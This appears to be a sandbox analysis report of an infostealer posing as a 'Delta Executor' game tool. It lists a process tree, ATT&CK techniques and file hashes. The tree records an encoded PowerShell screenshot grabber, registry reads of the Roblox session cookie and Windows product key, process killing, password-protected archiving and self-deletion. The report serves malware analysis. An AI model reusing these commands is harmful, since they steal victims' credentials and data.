JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4saylzp4\4saylzp4.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C12.tmp" "c:\Users\Admin\AppData\Local\Temp\4saylzp4\CSCD0E7B3D979B14DEB89727483EA94499.TMP"7⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1468"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14685⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1468"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14685⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1924"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19245⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1924"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19245⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3240"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 32405⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3240"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 32405⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4868"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48685⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4868"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48685⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1456"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14565⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1456"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 14565⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3104"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31045⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3104"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 31045⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4584"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45845⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4584"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45845⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2748"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27485⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2748"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27485⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48325⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48325⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵
-
C:\Windows\system32\getmac.exegetmac5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46082\rar.exe a -r -hp"Kizaki123" "C:\Users\Admin\AppData\Local\Temp\1Nbtc.zip" *"4⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI46082\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI46082\rar.exe a -r -hp"Kizaki123" "C:\Users\Admin\AppData\Local\Temp\1Nbtc.zip" *5⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\Delta Executor.exe""4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40B
MD51fd2bcf7be677e004a5421b78e261340
SHA14e5abd04329ee1ffaebe9c04b67deef17f89ff84
SHA256f539c848f584add20b43d5daefd614526b67adbf22b0c89eaa7802a8a653cd31
SHA512929499946e38281bd808b37b362c4a86f3b6382eb1ecd5fc094410d3688906d14a114ca930a2cf38b6241ab734bc5959e6fe541270d47ca9538e82a68c99cc77
-
Filesize
9KB
MD5aed416e371ba6f236a378749d9669544
SHA167321ae94eae8619e2dc78c8870a6a7ab6a2aa66
SHA25617619b3652a5b753fad5e007327456a6e334fbd2432c67751711dd18061ba28f
SHA5127202c41a42fbae611f0d52324086f777d7c433bd5e7201ca083b65500c7cce603f82d2eb171a417874424b504e8a5eba71c9c51319c1fb981120f24ab21412db
-
Filesize
649B
MD5a894fe55f6a49896ac4bae85431fabd7
SHA1e546659666055b471410ec64fbbf950e1613e4b7
SHA25685a572677acc0978523c89d79971e6bd55622dcf6653253fb490a70521c6ecd2
SHA5128dbb2c5f4455b9d67526cb426728f45150b10b9b62ab21a014dacd3b7182a539e2884713384e68e5342d65a61393a64ae10ab406afa2d66748731f800ab946be
-
Filesize
120B
MD5a98e285d0fe381e42194ac8b357ed5a6
SHA1d643b6fd4024bca19c9f4f6fe51f9ad426b0bb3e
SHA256570fce154c7fdfe1dfb6c790d857100ed0f232fb969f9eeb55015b80844dde7d
SHA512e391206296a73c311442da9ab53b11847a3d0618df694ec7519278cdeb6616346a4f13914480da3f640f3f47727e23df6f9d86daef0e37e1849e060e10d2a8aa
-
Filesize
851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
Filesize
854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
24B
MD50edec5128c1ad9f14033aac67608f4a7
SHA19fbe0a845024186cd5f912f763456ae7e34f1aa2
SHA256dd9d85694ffd4d6b18c0d6803e70b426d32f78b4324a5eded75c9be5a213f184
SHA512a99de5ae88108896325a2e022ec63d996b0499197433a1b5381abf44219811571a379b3d9d004e5a65222f177a06bb74cf282ccc927b3b26281da27a45b83c7b
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
23B
MD53fd11ff447c1ee23538dc4d9724427a3
SHA11335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA51210a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824
-
Filesize
2KB
MD55f0088a3cf9ca08d57a57a9e3a7c5106
SHA120fb50d1f12cd6dbeb4a5d99bf9383c11093bad0
SHA2560b33dc44a7dd92d3eeba841f2acd1c81c0c45c7b6653fe7cf1462751c7497384
SHA51270f90f31d0a9bff1b46931f1536ed7f21aff737fed09a7724500cc8f50e034e395355c7674e17b61ce22850d9e5ca4332fe30ef5973def037bfdf9331052cf5d
-
Filesize
2KB
MD5de3d91e039ba6e01ac346586289bd22a
SHA141d5219889af1ad2062d8c2d97d0fb7d80d55a0f
SHA2568c7ee553bc090f7ebf241d75f33707cccc4c8dca029dc835335da7f681719374
SHA512f2474c5715a3f078167aae1b927f63ace52749f3594fda226206cc2a3c36e7d99e07cef912d019fbe66a6429cd109c8cd3b1989c4bc97f7ca77e53b71315ce3f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD58f0544547d0c9519fbe760a1b30f07cf
SHA1e2b48aeb7f8a72c87597629c3ea9e909d350b9ab
